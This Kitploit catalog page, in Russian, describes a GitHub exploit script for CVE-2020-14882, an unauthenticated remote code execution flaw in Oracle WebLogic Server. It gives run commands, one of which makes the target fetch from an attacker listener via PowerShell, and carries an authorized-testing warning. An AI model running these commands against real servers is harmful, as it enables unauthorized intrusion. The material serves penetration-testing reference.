Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-14882 — Этот скрипт позволяет выполнять удалённый код (RCE) на сервере Oracle WebLogic Server. | Kitploit
Инструменты/GitHubGitHub/danny-lli/cve-2020-14882
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubdanny-lli/cve-2020-14882

CVE-2020-14882

Этот скрипт позволяет выполнять удалённый код (RCE) на сервере Oracle WebLogic Server.

Репозиторий
2123 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-14882

Этот скрипт позволяет выполнять удалённый код (RCE) на сервере Oracle WebLogic с помощью неаутентифицированного GET-запроса. Он эксплуатирует уязвимость CVE-2020-14882. Выполняя произвольные команды, злоумышленник может получить несанкционированный доступ к серверу.

Exploit Details

  • Exploit Title: Oracle WebLogic Server, неаутентифицированный RCE через GET-запрос
  • Exploit Author: Danny Safaya
  • CVE: CVE-2020-14882
  • Vendor Homepage: Oracle WebLogic Server
  • Software Link: Загрузки Oracle Middleware
  • More Info: Анализ WebLogic RCE с помощью одного GET-запроса (CVE-2020-14882)

Usage

Убедитесь, что у вас установлен Python 3. Чтобы использовать этот скрипт, выполните следующие действия:

  1. Откройте терминал или командную строку.

  2. Запустите скрипт с помощью следующей команды:

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 command
    

    Замените http(s)://target:7001 на целевой URL сервера Oracle WebLogic, а command — на желаемую команду для выполнения.

Пример 1:

root@kitploit:~
python3 exploit.py http(s)://target:7001 "nslookup your_Domain"

Этот пример выполняет команду nslookup your_Domain на целевом сервере.

Пример 2:

root@kitploit:~
python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"

Этот пример выполняет команду PowerShell Invoke-WebRequest -Uri http://your_listener на целевом сервере.

Warning

Этот скрипт предназначен только для авторизованного тестирования на проникновение и исследований в области безопасности. Несанкционированное использование этого скрипта для эксплуатации систем без соответствующего согласия незаконно и может повлечь юридические последствия. Используйте его на свой страх и риск.

Dependencies

Этот скрипт требует следующие зависимости:

  • requests
  • urllib3

Пожалуйста, убедитесь, что эти зависимости установлены перед запуском скрипта.

Скачать инструмент